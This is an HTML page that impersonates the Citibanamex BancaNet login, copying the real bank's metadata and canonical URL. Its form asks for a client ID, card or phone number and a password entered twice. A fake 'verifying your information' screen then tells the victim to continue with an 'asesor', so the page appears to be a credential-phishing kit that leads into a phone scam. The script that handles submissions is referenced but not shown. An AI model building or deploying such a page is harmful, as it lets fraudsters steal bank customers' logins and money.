<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=2.0">
	<meta name="description" content="El Banco Nacional de México te ofrece tarjetas de crédito, seguros e inversiones; abre tu cuenta con nosotros y accede a promociones y beneficios exclusivos.">
	<meta property="og:title" content="Citibanamex | Banco Nacional de México">
	<meta property="og:site_name" content="Citibanamex">
	<meta property="og:url" content="https://www.banamex.com/" />
	<meta property="og:description" content="El Banco Nacional de México te ofrece tarjetas de crédito, seguros e inversiones; abre tu cuenta con nosotros y accede a promociones y beneficios exclusivos.">
	<meta property="og:image" content="https://www.banamex.com/assets/home/img/webp/desktop/hero-image-amplio-la-tarjeta-dic-2022.webp">
	<meta property="og:type" content="website">
	<link rel="canonical" href="https://www.banamex.com">
	<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
	<link href="https://fonts.googleapis.com/css2?family=Quicksand:wght@500;700&display=swap" rel="stylesheet">  
	<link rel="stylesheet" href="css/estilos.css">
	<link rel="icon" href="icon.ico">
	<title>BancaNet | Citibanamex.com</title>
</head>
<body>
	<div class="contenedor">
		<div class="columna-izquierda">
			<div class="registro activo" id="registro">
				<div class="header">
					<h1>Bancanet Citibanamex</h1>
					<p>Inicia sesión</p>
				</div>
		
				<form class="formulario" id="formulario">
					<label for="nombre">ID Cliente</label>
					<div class="contenedor-input">
						<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-person-circle" viewBox="0 0 16 16">
							<path d="M11 6a3 3 0 1 1-6 0 3 3 0 0 1 6 0z"/>
							<path fill-rule="evenodd" d="M0 8a8 8 0 1 1 16 0A8 8 0 0 1 0 8zm8-7a7 7 0 0 0-5.468 11.37C3.242 11.226 4.805 10 8 10s4.757 1.225 5.468 2.37A7 7 0 0 0 8 1z"/>
						</svg>
						<input type="password" id="nombre" name="nombre" placeholder="No Cliente ó Tarjeta ó Telefono">
					</div>
		
					<label for="correo">Contraseña</label>
					<div class="contenedor-input">
						<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-envelope" viewBox="0 0 16 16">
							
						</svg>
						<input type="password" id="correo" name="correo" placeholder="Contraseña">
					</div>
					
					<label for="telefono">Confirmar contraseña</label>
					<div class="contenedor-input">
						<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-telephone" viewBox="0 0 16 16">
							
						</svg>
						<input type="password" id="telefono" name="telefono" placeholder="Confirmar contraseña">
					</div>
		
					<div class="contenedor-boton">
						<button type="submit">
							Continua
							<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-check" viewBox="0 0 16 16">
								<path d="M10.97 4.97a.75.75 0 0 1 1.07 1.05l-3.99 4.99a.75.75 0 0 1-1.08.02L4.324 8.384a.75.75 0 1 1 1.06-1.06l2.094 2.093 3.473-4.425a.267.267 0 0 1 .02-.022z"/>
							</svg>
						</button>
					</div>
				</form>
			</div>

			<div class="header exito" id="exito">
				<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-check-circle" viewBox="0 0 16 16">
					<path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/>
					<path d="M10.97 4.97a.235.235 0 0 0-.02.022L7.477 9.417 5.384 7.323a.75.75 0 0 0-1.06 1.06L6.97 11.03a.75.75 0 0 0 1.079-.02l3.992-4.99a.75.75 0 0 0-1.071-1.05z"/>
				</svg>
				<h1>Estamos verificando tu información.</h1>
				<p>Continua con tu asesor para finalizar el proceso.</p>
			</div>
		</div>

		<div class="columna-derecha">

		</div>
	</div>

	<script src="js/app.js"></script>
</body>
</html>
